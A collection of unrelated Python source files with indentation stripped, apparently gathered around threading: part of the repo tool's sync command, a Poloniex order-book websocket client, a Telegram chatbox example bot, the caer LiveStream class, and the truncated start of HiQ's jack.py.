err_event = _threading.Event()
for project_list in objdir_project_map.values():
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if err_event.isSet() and not opt.force_broken:
break
sem.acquire()
kwargs = dict(opt=opt,
projects=project_list,
sem=sem,
lock=lock,
fetched=fetched,
pm=pm,
err_event=err_event)
if self.jobs > 1:
t = _threading.Thread(target = self._FetchProjectList,
kwargs = kwargs)
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
else:
self._FetchProjectList(**kwargs)
for t in threads:
t.join()
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.isSet() and not opt.force_broken:
print('\nerror: Exited sync due to fetch errors', file=sys.stderr)
sys.exit(1)
pm.end()
self._fetch_times.Save()
if not self.manifest.IsArchive:
self._GCProjects(projects)
return fetched
def _GCProjects(self, projects):
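# Run 'git gc --auto' on each unique bare git dir; shared projects disable pruning first, and gc runs in parallel when git supports -c and multiprocessing is available.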
gc_gitdirs = {}
for project in projects:
if len(project.manifest.GetProjectsWithName(project.name)) > 1:
print('Shared project %s found, disabling pruning.' % project.name)
project.bare_git.config('--replace-all', 'gc.pruneExpire', 'never')
gc_gitdirs[project.gitdir] = project.bare_git
has_dash_c = git_require((1, 7, 2))
if multiprocessing and has_dash_c:
cpu_count = multiprocessing.cpu_count()
else:
cpu_count = 1
jobs = min(self.jobs, cpu_count)
if jobs < 2:
for bare_git in gc_gitdirs.values():
bare_git.gc('--auto')
return
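# Split the machine's pack threads across the concurrent gc jobs.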
config = {'pack.threads': cpu_count // jobs if cpu_count > jobs else 1}
threads = set()
sem = _threading.Semaphore(jobs)
err_event = _threading.Event()
def GC(bare_git):
try:
try:
bare_git.gc('--auto', config=config)
except GitError:
err_event.set()
except:
err_event.set()
raise
finally:
sem.release()
for bare_git in gc_gitdirs.values():
if err_event.isSet():
break
sem.acquire()
t = _threading.Thread(target=GC, args=(bare_git,))
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
if err_event.isSet():
print('\nerror: Exited sync due to gc errors', file=sys.stderr)
sys.exit(1)
def _ReloadManifest(self, manifest_name=None):
if manifest_name:
# Override calls _Unload already
self.manifest.Override(manifest_name)
else:
self.manifest._Unload()
def _DeleteProject(self, path):
print('Deleting obsolete path %s' % path, file=sys.stderr)
# Delete the .git directory first, so we're less likely to have a partially
# working git repository around. There shouldn't be any git projects here,
# so rmtree works.
try:
platform_utils.rmtree(os.path.join(path, '.git'))
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(path, '.git'), str(e)), file=sys.stderr)
print('error: Failed to delete obsolete path %s' % path, file=sys.stderr)
print(' remove manually, then run sync again', file=sys.stderr)
return -1
# Delete everything under the worktree, except for directories that contain
# another git project
dirs_to_remove = []
failed = False
for root, dirs, files in platform_utils.walk(path):
for f in files:
try:
platform_utils.remove(os.path.join(root, f))
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(root, f), str(e)), file=sys.stderr)
failed = True
dirs[:] = [d for d in dirs
if not os.path.lexists(os.path.join(root, d, '.git'))]
dirs_to_remove += [os.path.join(root, d) for d in dirs
if os.path.join(root, d) not in dirs_to_remove]
for d in reversed(dirs_to_remove):
if platform_utils.islink(d):
try:
platform_utils.remove(d)
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(root, d), str(e)), file=sys.stderr)
failed = True
elif len(platform_utils.listdir(d)) == 0:
try:
platform_utils.rmdir(d)
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(root, d), str(e)), file=sys.stderr)
failed = True
continue
if failed:
print('error: Failed to delete obsolete path %s' % path, file=sys.stderr)
print(' remove manually, then run sync again', file=sys.stderr)
return -1
# Try deleting parent dirs if they are empty
project_dir = path
while project_dir != self.manifest.topdir:
if len(platform_utils.listdir(project_dir)) == 0:
platform_utils.rmdir(project_dir)
else:
break
project_dir = os.path.dirname(project_dir)
return 0
def UpdateProjectList(self, opt):
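# Rewrite project.list from the current manifest and delete working trees of projects that are no longer listed, refusing to remove dirty ones unless --force-remove-dirty is set.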
new_project_paths = []
for project in self.GetProjects(None, missing_ok=True):
if project.relpath:
new_project_paths.append(project.relpath)
file_name = 'project.list'
file_path = os.path.join(self.manifest.repodir, file_name)
old_project_paths = []
if os.path.exists(file_path):
fd = open(file_path, 'r')
try:
old_project_paths = fd.read().split('\n')
finally:
fd.close()
for path in old_project_paths:
if not path:
continue
if path not in new_project_paths:
# If the path has already been deleted, we don't need to do it
gitdir = os.path.join(self.manifest.topdir, path, '.git')
if os.path.exists(gitdir):
project = Project(
manifest = self.manifest,
name = path,
remote = RemoteSpec('origin'),
gitdir = gitdir,
objdir = gitdir,
worktree = os.path.join(self.manifest.topdir, path),
relpath = path,
revisionExpr = 'HEAD',
revisionId = None,
groups = None)
if project.IsDirty() and opt.force_remove_dirty:
print('WARNING: Removing dirty project "%s": uncommitted changes '
'erased' % project.relpath, file=sys.stderr)
self._DeleteProject(project.worktree)
elif project.IsDirty():
print('error: Cannot remove project "%s": uncommitted changes '
'are present' % project.relpath, file=sys.stderr)
print(' commit changes, then run sync again',
file=sys.stderr)
return -1
elif self._DeleteProject(project.worktree):
return -1
new_project_paths.sort()
fd = open(file_path, 'w')
try:
fd.write('\n'.join(new_project_paths))
fd.write('\n')
finally:
fd.close()
return 0
def Execute(self, opt, args):
if opt.jobs:
self.jobs = opt.jobs
if self.jobs > 1:
soft_limit, _ = _rlimit_nofile()
self.jobs = min(self.jobs, (soft_limit - 5) // 3)
if opt.network_only and opt.detach_head:
print('error: cannot combine -n and -d', file=sys.stderr)
sys.exit(1)
if opt.network_only and opt.local_only:
print('error: cannot combine -n and -l', file=sys.stderr)
sys.exit(1)
if opt.manifest_name and opt.smart_sync:
print('error: cannot combine -m and -s', file=sys.stderr)
sys.exit(1)
if opt.manifest_name and opt.smart_tag:
print('error: cannot combine -m and -t', file=sys.stderr)
sys.exit(1)
if opt.manifest_server_username or opt.manifest_server_password:
if not (opt.smart_sync or opt.smart_tag):
print('error: -u and -p may only be combined with -s or -t',
file=sys.stderr)
sys.exit(1)
if None in [opt.manifest_server_username, opt.manifest_server_password]:
print('error: both -u and -p must be given', file=sys.stderr)
sys.exit(1)
if opt.manifest_name:
self.manifest.Override(opt.manifest_name)
manifest_name = opt.manifest_name
smart_sync_manifest_name = "smart_sync_override.xml"
smart_sync_manifest_path = os.path.join(
self.manifest.manifestProject.worktree, smart_sync_manifest_name)
if opt.smart_sync or opt.smart_tag:
if not self.manifest.manifest_server:
print('error: cannot smart sync: no manifest server defined in '
'manifest', file=sys.stderr)
sys.exit(1)
manifest_server = self.manifest.manifest_server
if not opt.quiet:
print('Using manifest server %s' % manifest_server)
if '@' not in manifest_server:
username = None
password = None
if opt.manifest_server_username and opt.manifest_server_password:
username = opt.manifest_server_username
password = opt.manifest_server_password
else:
try:
info = netrc.netrc()
except IOError:
# .netrc file does not exist or could not be opened
pass
else:
try:
parse_result = urllib.parse.urlparse(manifest_server)
if parse_result.hostname:
auth = info.authenticators(parse_result.hostname)
if auth:
username, _account, password = auth
else:
print('No credentials found for %s in .netrc'
% parse_result.hostname, file=sys.stderr)
except netrc.NetrcParseError as e:
print('Error parsing .netrc file: %s' % e, file=sys.stderr)
if (username and password):
manifest_server = manifest_server.replace('://', '://%s:%s@' %
(username, password),
1)
transport = PersistentTransport(manifest_server)
if manifest_server.startswith('persistent-'):
manifest_server = manifest_server[len('persistent-'):]
try:
server = xmlrpc.client.Server(manifest_server, transport=transport)
if opt.smart_sync:
p = self.manifest.manifestProject
b = p.GetBranch(p.CurrentBranch)
branch = b.merge
if branch.startswith(R_HEADS):
branch = branch[len(R_HEADS):]
env = os.environ.copy()
if 'SYNC_TARGET' in env:
target = env['SYNC_TARGET']
[success, manifest_str] = server.GetApprovedManifest(branch, target)
elif 'TARGET_PRODUCT' in env and 'TARGET_BUILD_VARIANT' in env:
target = '%s-%s' % (env['TARGET_PRODUCT'],
env['TARGET_BUILD_VARIANT'])
[success, manifest_str] = server.GetApprovedManifest(branch, target)
else:
[success, manifest_str] = server.GetApprovedManifest(branch)
else:
assert(opt.smart_tag)
[success, manifest_str] = server.GetManifest(opt.smart_tag)
if success:
manifest_name = smart_sync_manifest_name
try:
f = open(smart_sync_manifest_path, 'w')
try:
f.write(manifest_str)
finally:
f.close()
except IOError as e:
print('error: cannot write manifest to %s:\n%s'
% (smart_sync_manifest_path, e),
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_name)
else:
print('error: manifest server RPC call failed: %s' %
manifest_str, file=sys.stderr)
sys.exit(1)
except (socket.error, IOError, xmlrpc.client.Fault) as e:
print('error: cannot connect to manifest server %s:\n%s'
% (self.manifest.manifest_server, e), file=sys.stderr)
sys.exit(1)
except xmlrpc.client.ProtocolError as e:
print('error: cannot connect to manifest server %s:\n%d %s'
% (self.manifest.manifest_server, e.errcode, e.errmsg),
file=sys.stderr)
sys.exit(1)
else: # Not smart sync or smart tag mode
if os.path.isfile(smart_sync_manifest_path):
try:
platform_utils.remove(smart_sync_manifest_path)
except OSError as e:
print('error: failed to remove existing smart sync override manifest: %s' %
e, file=sys.stderr)
rp = self.manifest.repoProject
rp.PreSync()
mp = self.manifest.manifestProject
mp.PreSync()
if opt.repo_upgraded:
_PostRepoUpgrade(self.manifest, quiet=opt.quiet)
if not opt.local_only:
start = time.time()
success = mp.Sync_NetworkHalf(quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
no_tags=opt.no_tags,
optimized_fetch=opt.optimized_fetch,
submodules=self.manifest.HasSubmodules)
finish = time.time()
self.event_log.AddSync(mp, event_log.TASK_SYNC_NETWORK,
start, finish, success)
if mp.HasChanges:
syncbuf = SyncBuffer(mp.config)
start = time.time()
mp.Sync_LocalHalf(syncbuf, submodules=self.manifest.HasSubmodules)
clean = syncbuf.Finish()
self.event_log.AddSync(mp, event_log.TASK_SYNC_LOCAL,
start, time.time(), clean)
if not clean:
sys.exit(1)
self._ReloadManifest(manifest_name)
if opt.jobs is None:
self.jobs = self.manifest.default.sync_j
if self.gitc_manifest:
gitc_manifest_projects = self.GetProjects(args,
missing_ok=True)
gitc_projects = []
opened_projects = []
for project in gitc_manifest_projects:
if project.relpath in self.gitc_manifest.paths and \
self.gitc_manifest.paths[project.relpath].old_revision:
opened_projects.append(project.relpath)
else:
gitc_projects.append(project.relpath)
if not args:
gitc_projects = None
if gitc_projects != [] and not opt.local_only:
print('Updating GITC client: %s' % self.gitc_manifest.gitc_client_name)
manifest = GitcManifest(self.repodir, self.gitc_manifest.gitc_client_name)
if manifest_name:
manifest.Override(manifest_name)
else:
manifest.Override(self.manifest.manifestFile)
gitc_utils.generate_gitc_manifest(self.gitc_manifest,
manifest,
gitc_projects)
print('GITC client successfully synced.')
# The opened projects need to be synced as normal, therefore we
# generate a new args list to represent the opened projects.
# TODO: make this more reliable -- if there's a project name/path overlap,
# this may choose the wrong project.
args = [os.path.relpath(self.manifest.paths[path].worktree, os.getcwd())
for path in opened_projects]
if not args:
return
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
self._fetch_times = _FetchTimes(self.manifest)
if not opt.local_only:
to_fetch = []
now = time.time()
if _ONE_DAY_S <= (now - rp.LastFetch):
to_fetch.append(rp)
to_fetch.extend(all_projects)
to_fetch.sort(key=self._fetch_times.Get, reverse=True)
fetched = self._Fetch(to_fetch, opt)
_PostRepoFetch(rp, opt.no_repo_verify)
if opt.network_only:
# bail out now; the rest touches the working tree
return
# Iteratively fetch missing and/or nested unregistered submodules
previously_missing_set = set()
while True:
self._ReloadManifest(manifest_name)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
missing = []
for project in all_projects:
if project.gitdir not in fetched:
missing.append(project)
if not missing:
break
        # Stop fetching repos that will never appear: if the set of missing
        # repos has not changed since the last fetch, break out of the loop.
missing_set = set(p.name for p in missing)
if previously_missing_set == missing_set:
break
previously_missing_set = missing_set
fetched.update(self._Fetch(missing, opt))
if self.manifest.IsMirror or self.manifest.IsArchive:
# bail out now, we have no working tree
return
if self.UpdateProjectList(opt):
sys.exit(1)
syncbuf = SyncBuffer(mp.config,
detach_head = opt.detach_head)
pm = Progress('Syncing work tree', len(all_projects))
for project in all_projects:
pm.update()
if project.worktree:
start = time.time()
project.Sync_LocalHalf(syncbuf, force_sync=opt.force_sync)
self.event_log.AddSync(project, event_log.TASK_SYNC_LOCAL,
start, time.time(), syncbuf.Recently())
pm.end()
print(file=sys.stderr)
if not syncbuf.Finish():
sys.exit(1)
# If there's a notice that's supposed to print at the end of the sync, print
# it now...
if self.manifest.notice:
print(self.manifest.notice)
def _PostRepoUpgrade(manifest, quiet=False):
wrapper = Wrapper()
if wrapper.NeedSetupGnuPG():
wrapper.SetupGnuPG(quiet)
for project in manifest.projects:
if project.Exists:
project.PostRepoUpgrade()
def _PostRepoFetch(rp, no_repo_verify=False, verbose=False):
if rp.HasChanges:
print('info: A new version of repo is available', file=sys.stderr)
print(file=sys.stderr)
if no_repo_verify or _VerifyTag(rp):
syncbuf = SyncBuffer(rp.config)
rp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
print('info: Restarting repo with latest version', file=sys.stderr)
raise RepoChangedException(['--repo-upgraded'])
else:
print('warning: Skipped upgrade to unverified version', file=sys.stderr)
else:
if verbose:
print('repo version %s is current' % rp.work_git.describe(HEAD),
file=sys.stderr)
def _VerifyTag(project):
gpg_dir = os.path.expanduser('~/.repoconfig/gnupg')
if not os.path.exists(gpg_dir):
    print('warning: GnuPG was not available during last "repo init"\n'
          'warning: Cannot automatically authenticate repo.',
          file=sys.stderr)
return True
try:
cur = project.bare_git.describe(project.GetRevisionId())
except GitError:
cur = None
if not cur \
or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur):
rev = project.revisionExpr
if rev.startswith(R_HEADS):
rev = rev[len(R_HEADS):]
print(file=sys.stderr)
print("warning: project '%s' branch '%s' is not signed"
% (project.name, rev), file=sys.stderr)
return False
env = os.environ.copy()
env['GIT_DIR'] = project.gitdir.encode()
env['GNUPGHOME'] = gpg_dir.encode()
cmd = [GIT, 'tag', '-v', cur]
proc = subprocess.Popen(cmd,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
env = env)
out = proc.stdout.read()
proc.stdout.close()
err = proc.stderr.read()
proc.stderr.close()
if proc.wait() != 0:
print(file=sys.stderr)
print(out, file=sys.stderr)
print(err, file=sys.stderr)
print(file=sys.stderr)
return False
return True
class _FetchTimes(object):
_ALPHA = 0.5
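  # Fetch durations are smoothed with an exponential moving average:
  #   new_estimate = _ALPHA * latest + (1 - _ALPHA) * previous
  # Worked example (illustrative numbers): with a stored estimate of 40s and a
  # latest fetch of 20s, Set() stores 0.5 * 20 + 0.5 * 40 = 30s; the values
  # Get() returns are then used to sort projects so slower-fetching ones start
  # first.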
def __init__(self, manifest):
self._path = os.path.join(manifest.repodir, '.repo_fetchtimes.json')
self._times = None
self._seen = set()
def Get(self, project):
self._Load()
return self._times.get(project.name, _ONE_DAY_S)
def Set(self, project, t):
self._Load()
name = project.name
old = self._times.get(name, t)
self._seen.add(name)
a = self._ALPHA
self._times[name] = (a*t) + ((1-a) * old)
def _Load(self):
if self._times is None:
try:
f = open(self._path)
try:
self._times = json.load(f)
finally:
f.close()
except (IOError, ValueError):
try:
platform_utils.remove(self._path)
except OSError:
pass
self._times = {}
def Save(self):
if self._times is None:
return
to_delete = []
for name in self._times:
if name not in self._seen:
to_delete.append(name)
for name in to_delete:
del self._times[name]
try:
f = open(self._path, 'w')
try:
json.dump(self._times, f, indent=2)
finally:
f.close()
except (IOError, TypeError):
try:
platform_utils.remove(self._path)
except OSError:
pass
# This is a replacement for xmlrpc.client.Transport using urllib.request
# and supporting persistent-http[s]. Unlike the normal transport, it cannot
# change hosts from request to request; the real URL is passed during
# initialization. (See the usage sketch after the class below.)
class PersistentTransport(xmlrpc.client.Transport):
def __init__(self, orig_host):
self.orig_host = orig_host
def request(self, host, handler, request_body, verbose=False):
with GetUrlCookieFile(self.orig_host, not verbose) as (cookiefile, proxy):
# Python doesn't understand cookies with the #HttpOnly_ prefix
# Since we're only using them for HTTP, copy the file temporarily,
# stripping those prefixes away.
if cookiefile:
        # Text mode so the str writes below work; the header needs its own line.
        tmpcookiefile = tempfile.NamedTemporaryFile(mode='w')
        tmpcookiefile.write("# HTTP Cookie File\n")
try:
with open(cookiefile) as f:
for line in f:
if line.startswith("#HttpOnly_"):
line = line[len("#HttpOnly_"):]
tmpcookiefile.write(line)
tmpcookiefile.flush()
cookiejar = cookielib.MozillaCookieJar(tmpcookiefile.name)
try:
cookiejar.load()
except cookielib.LoadError:
cookiejar = cookielib.CookieJar()
finally:
tmpcookiefile.close()
else:
cookiejar = cookielib.CookieJar()
proxyhandler = urllib.request.ProxyHandler
if proxy:
proxyhandler = urllib.request.ProxyHandler({
"http": proxy,
"https": proxy })
opener = urllib.request.build_opener(
urllib.request.HTTPCookieProcessor(cookiejar),
proxyhandler)
url = urllib.parse.urljoin(self.orig_host, handler)
parse_results = urllib.parse.urlparse(url)
scheme = parse_results.scheme
if scheme == 'persistent-http':
scheme = 'http'
if scheme == 'persistent-https':
# If we're proxying through persistent-https, use http. The
# proxy itself will do the https.
if proxy:
scheme = 'http'
else:
scheme = 'https'
# Parse out any authentication information using the base class
host, extra_headers, _ = self.get_host_info(parse_results.netloc)
url = urllib.parse.urlunparse((
scheme,
host,
parse_results.path,
parse_results.params,
parse_results.query,
parse_results.fragment))
request = urllib.request.Request(url, request_body)
if extra_headers is not None:
for (name, header) in extra_headers:
request.add_header(name, header)
request.add_header('Content-Type', 'text/xml')
try:
response = opener.open(request)
except urllib.error.HTTPError as e:
if e.code == 501:
# We may have been redirected through a login process
# but our POST turned into a GET. Retry.
response = opener.open(request)
else:
raise
p, u = xmlrpc.client.getparser()
      while True:
data = response.read(1024)
if not data:
break
p.feed(data)
p.close()
return u.close()
def close(self):
pass
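# A minimal sketch of driving PersistentTransport directly (the host, handler
# path, and tag below are illustrative, not taken from this file):
#
#   transport = PersistentTransport('persistent-https://example.com/manifestserver')
#   body = xmlrpc.client.dumps(('some-tag',), 'GetManifest').encode('utf-8')
#   reply = transport.request('example.com', '/manifestserver', body)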
|
poloniex.py
|
from autobahn.asyncio.wamp import ApplicationSession
from autobahn.asyncio.wamp import ApplicationRunner
from asyncio import coroutine
from time import sleep
import threading
def start_poloniex_runner(delegate):
runner = ApplicationRunner("wss://api.poloniex.com:443", "realm1", extra={'poloniex': delegate})
runner.run(PoloniexComponent)
class Poloniex:
def __init__(self):
self.bids = []
self.asks = []
def start(self):
thr = threading.Thread(target=start_poloniex_runner, args=(self,), kwargs={})
thr.start()
# _thread.start_new_thread(self.runner.run, (PoloniexComponent,))
# self.runner.run(PoloniexComponent)
def onTicker(self, currencyPair, last, lowestAsk, highestBid, percentChange, baseVolume, quoteVolume, isFrozen, high, low):
# print(currencyPair, last)
pass
def onMarketUpdate(self, *args, seq=0):
for update in args:
update_type = update['type']
if update_type == 'orderBookModify':
self.onOrderbookUpdate(update['data'], seq)
elif update_type == 'orderBookRemove':
self.onOrderbookRemove(update['data'], seq)
elif update_type == 'newTrade':
self.onTrade(update['data'], seq)
def onOrderbookUpdate(self, data, time):
if data['type'] == 'bid':
self.updateBid(float(data['rate']), float(data['amount']), int(time))
elif data['type'] == 'ask':
self.updateAsk(float(data['rate']), float(data['amount']), int(time))
def onOrderbookRemove(self, data, time):
if data['type'] == 'bid':
self.updateBid(float(data['rate']), 0, int(time))
elif data['type'] == 'ask':
self.updateAsk(float(data['rate']), 0, int(time))
def onTrade(self, data, time):
# print('TRADE', data)
pass
def updateBid(self, price, amount, time):
index = 0
        # Bids are kept in descending price order; stop at the first entry whose
        # price is not above ours so equal prices are updated/removed in place.
        while index < len(self.bids):
            if price >= self.bids[index].price:
                break
            index += 1
if index < len(self.bids):
if amount > 0:
if price == self.bids[index].price:
if time > self.bids[index].time:
self.bids[index].amount = amount
self.bids[index].time = time
else:
self.bids.insert(index, Order(price, amount, time))
else:
if price == self.bids[index].price:
self.bids.pop(index)
        else:
            # Ignore removals (amount == 0) for prices we never stored.
            if amount > 0:
                self.bids.append(Order(price, amount, time))
print('BIDS: ' + str(self.bids))
def updateAsk(self, price, amount, time):
index = 0
        # Asks are kept in ascending price order; stop at the first entry whose
        # price is not below ours so equal prices are updated/removed in place.
        while index < len(self.asks):
            if price <= self.asks[index].price:
                break
            index += 1
if index < len(self.asks):
if amount > 0:
if price == self.asks[index].price:
if time > self.asks[index].time:
self.asks[index].amount = amount
self.asks[index].time = time
else:
self.asks.insert(index, Order(price, amount, time))
else:
if price == self.asks[index].price:
self.asks.pop(index)
        else:
            # Ignore removals (amount == 0) for prices we never stored.
            if amount > 0:
                self.asks.append(Order(price, amount, time))
print('ASKS: ' + str(self.asks))
class Order:
def __init__(self, price, amount, time):
self.price = price
self.amount = amount
self.time = time
def __repr__(self):
# return '<' + str(self.price) + ', ' + str(self.amount) + '>'
return '<' + str(self.price) + '>'
class PoloniexComponent(ApplicationSession):
def onConnect(self):
self.poloniex = self.config.extra['poloniex']
self.join(self.config.realm)
@coroutine
def onJoin(self, details):
try:
yield from self.subscribe(self.poloniex.onTicker, 'ticker')
yield from self.subscribe(self.poloniex.onMarketUpdate, 'BTC_XMR')
except Exception as e:
print("Could not subscribe to topic:", e)
def main():
polo = Poloniex()
polo.start()
    while True:
        # Keep the main thread alive while the WAMP session runs in its thread.
        sleep(1)
if __name__ == "__main__":
main()
|
chatbox_nodb.py
|
import sys
import time
import amanobot
from amanobot.loop import MessageLoop
from amanobot.delegate import (
per_chat_id_in, per_application, call, create_open, pave_event_space)
"""
$ python3 chatbox_nodb.py <token> <owner_id>
Chatbox - a mailbox for chats
1. People send messages to your bot.
2. Your bot remembers the messages.
3. You read the messages later.
It accepts the following commands from you, the owner, only:
- `/unread` - tells you who has sent you messages and how many
- `/next` - read next sender's messages
This example can be a starting point for **customer support**-type bots.
For example, customers send questions to a bot account; staff answer the
questions behind the scenes, making it look like the bot is answering them.
It further illustrates the use of `DelegatorBot` and `ChatHandler`, and how to
spawn delegates differently according to the role of users.
This example only handles text messages and stores messages in memory.
If the bot is killed, all messages are lost. It is an *example* after all.
"""
# Simulate a database to store unread messages
class UnreadStore():
def __init__(self):
self._db = {}
def put(self, msg):
chat_id = msg['chat']['id']
if chat_id not in self._db:
self._db[chat_id] = []
self._db[chat_id].append(msg)
# Pull all unread messages of a `chat_id`
def pull(self, chat_id):
messages = self._db[chat_id]
del self._db[chat_id]
# sort by date
messages.sort(key=lambda m: m['date'])
return messages
# Tells how many unread messages per chat_id
def unread_per_chat(self):
return [(k,len(v)) for k,v in self._db.items()]
# Accept commands from owner. Give him unread messages.
class OwnerHandler(amanobot.helper.ChatHandler):
def __init__(self, seed_tuple, store, **kwargs):
super(OwnerHandler, self).__init__(seed_tuple, **kwargs)
self._store = store
def _read_messages(self, messages):
for msg in messages:
# assume all messages are text
self.sender.sendMessage(msg['text'])
def on_chat_message(self, msg):
content_type, chat_type, chat_id = amanobot.glance(msg)
if content_type != 'text':
self.sender.sendMessage("I don't understand")
return
command = msg['text'].strip().lower()
# Tells who has sent you how many messages
if command == '/unread':
results = self._store.unread_per_chat()
lines = []
for r in results:
n = 'ID: %d\n%d unread' % r
lines.append(n)
if not len(lines):
self.sender.sendMessage('No unread messages')
else:
self.sender.sendMessage('\n'.join(lines))
# read next sender's messages
elif command == '/next':
results = self._store.unread_per_chat()
if not len(results):
self.sender.sendMessage('No unread messages')
return
chat_id = results[0][0]
unread_messages = self._store.pull(chat_id)
self.sender.sendMessage('From ID: %d' % chat_id)
self._read_messages(unread_messages)
else:
self.sender.sendMessage("I don't understand")
class MessageSaver(amanobot.helper.Monitor):
def __init__(self, seed_tuple, store, exclude):
        # The `capture` criteria captures every message that is not an event.
super(MessageSaver, self).__init__(seed_tuple, capture=[[lambda msg: not amanobot.is_event(msg)]])
self._store = store
self._exclude = exclude
# Store every message, except those whose sender is in the exclude list, or non-text messages.
def on_chat_message(self, msg):
content_type, chat_type, chat_id = amanobot.glance(msg)
if chat_id in self._exclude:
print('Chat id %d is excluded.' % chat_id)
return
if content_type != 'text':
print('Content type %s is ignored.' % content_type)
return
print('Storing message: %s' % msg)
self._store.put(msg)
import threading
class CustomThread(threading.Thread):
def start(self):
print('CustomThread starting ...')
super(CustomThread, self).start()
# Note how this function wraps around the `call()` function below to implement
# a custom thread for delegation.
def custom_thread(func):
def f(seed_tuple):
target = func(seed_tuple)
if type(target) is tuple:
run, args, kwargs = target
t = CustomThread(target=run, args=args, kwargs=kwargs)
else:
t = CustomThread(target=target)
return t
return f
class ChatBox(amanobot.DelegatorBot):
def __init__(self, token, owner_id):
self._owner_id = owner_id
self._seen = set()
self._store = UnreadStore()
super(ChatBox, self).__init__(token, [
# Here is a delegate to specially handle owner commands.
pave_event_space()(
per_chat_id_in([owner_id]), create_open, OwnerHandler, self._store, timeout=20),
# Only one MessageSaver is ever spawned for entire application.
(per_application(), create_open(MessageSaver, self._store, exclude=[owner_id])),
            # For senders never seen before, send them a welcome message.
(self._is_newcomer, custom_thread(call(self._send_welcome))),
])
# seed-calculating function: use returned value to indicate whether to spawn a delegate
def _is_newcomer(self, msg):
if amanobot.is_event(msg):
return None
chat_id = msg['chat']['id']
if chat_id == self._owner_id: # Sender is owner
return None # No delegate spawned
if chat_id in self._seen: # Sender has been seen before
return None # No delegate spawned
self._seen.add(chat_id)
return [] # non-hashable ==> delegates are independent, no seed association is made.
def _send_welcome(self, seed_tuple):
chat_id = seed_tuple[1]['chat']['id']
print('Sending welcome ...')
self.sendMessage(chat_id, 'Hello!')
TOKEN = sys.argv[1]
OWNER_ID = int(sys.argv[2])
bot = ChatBox(TOKEN, OWNER_ID)
MessageLoop(bot).run_as_thread()
print('Listening ...')
while True:
time.sleep(10)
|
livestream.py
|
# _____ ______ _____
# / ____/ /\ | ____ | __ \
# | | / \ | |__ | |__) | Caer - Modern Computer Vision
# | | / /\ \ | __| | _ / Languages: Python, C, C++
# | |___ / ____ \ | |____ | | \ \ http://github.com/jasmcaus/caer
# \_____\/_/ \_ \______ |_| \_\
# Licensed under the MIT License <http://opensource.org/licenses/MIT>
# SPDX-License-Identifier: MIT
# Copyright (c) 2020-21 The Caer Authors <http://github.com/jasmcaus>
#pylint:disable=no-member,pointless-string-statement
from threading import Thread
import math
import cv2 as cv
from .constants import FPS
__all__ = [
'LiveStream'
]
"""
Python threading has a specific meaning for daemon. A daemon thread will shut down immediately when the program exits. One way to think about these definitions is to consider the daemon thread a thread that runs in the background without worrying about shutting it down.
If a program is running Threads that are not daemons, then the program will wait for those threads to complete before it terminates. Threads that are daemons, however, are just killed wherever they are when the program is exiting.
"""
# This class can only handle live video streams. When applied to pre-existing
# videos, there appears to be an issue with threading; as a result, the video
# plays through at a high (almost 4x) speed.
# This issue has been noted and will be fixed in a future update.
class LiveStream:
r"""
    This is an auxiliary class that enables live video streaming for caer with
    minimal latency and little to no additional computational overhead.
    The basic idea behind it is to track and save the salient feature array for
    the given number of frames, and then use these anchor points to cancel out
    all perturbations relative to them for the incoming frames in the queue.
    This class relies heavily on **Threaded Queue mode** for error-free and
    ultra-fast frame handling.
    Args:
        source (int): Source path for the video. If ``source=0``, the default
            camera device is used. For multiple external camera devices, use
            incremented values, e.g. ``source=1`` represents the second camera
            device on your system.
"""
def __init__(self, source=0):
r"""
Source must either be an integer (0, 1, 2 etc) or a path to a video file
"""
if isinstance(source, str):
raise ValueError('Expected an integer. Got a filepath. LiveVideoStream is for live streams only')
# Initializing the video stream
self.stream = cv.VideoCapture(source)
        # Grab an initial frame so resolution and FPS can be queried right away.
        self.ret, self.frame = self.stream.read()
self.width = int(self.stream.get(cv.CAP_PROP_FRAME_WIDTH))
self.height = int(self.stream.get(cv.CAP_PROP_FRAME_HEIGHT))
self.res = (self.width, self.height)
self.fps = math.ceil(self.stream.get(FPS))
# Initializing the thread name
self.thread_name = 'DefaultVideoStream'
# Boolean to check whether stream should be killed
self.kill_stream = False
def begin_stream(self):
# Starting the thread to read frames from the video stream
thread = Thread(target=self.update, name=self.thread_name, args=())
thread.daemon = True
thread.start()
return self
def read(self):
return self.frame
def update(self):
while not self.kill_stream:
self.ret, self.frame = self.stream.read()
def release(self):
# Stops the stream
# Releases video pointer
self.kill_stream = True
# Counting frames not applicable for live video
# # Gets frame count
# def count_frames(self):
# if not self.kill_stream:
# if get_opencv_version() == '2':
# return int(self.stream.get(FRAME_COUNT_DEPR))
# else:
# return int(self.stream.get(FRAME_COUNT))
# Gets FPS count
def get_fps(self):
if not self.kill_stream:
return self.fps
# if get_opencv_version() == '2':
# return math.ceil(self.stream.get(FPS_DEPR))
# else:
# return math.ceil(self.stream.get(FPS))
# Get frame dimensions
def get_res(self):
return self.res
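# A minimal usage sketch for LiveStream (assumes a camera at index 0; shown as
# a comment so nothing runs on import):
#
#   stream = LiveStream(source=0).begin_stream()
#   print(stream.get_res(), stream.get_fps())
#   frame = stream.read()
#   stream.release()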
|
jack.py
|
# HiQ version 1.0.
#
# Copyright (c) 2022, Oracle and/or its affiliates.
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/
#
import os
from multiprocessing import Process, Queue, Lock
import itree
from hiq.tree import Tree
from hiq.utils import _check_overhead, get_env_bool, ensure_folder, get_home
import time
def log_jack_rotated(
log_file=f"{get_home()}/.hiq/log_jack.log",
max_bytes=500 * 1024 * 1024,
backup_count=20,
):
if get_env_bool("NO_JACK_LOG"):
return None
import logging
from logging.handlers import RotatingFileHandler
ensure_folder(log_file)
my_handler = RotatingFileHandler(
log_file,
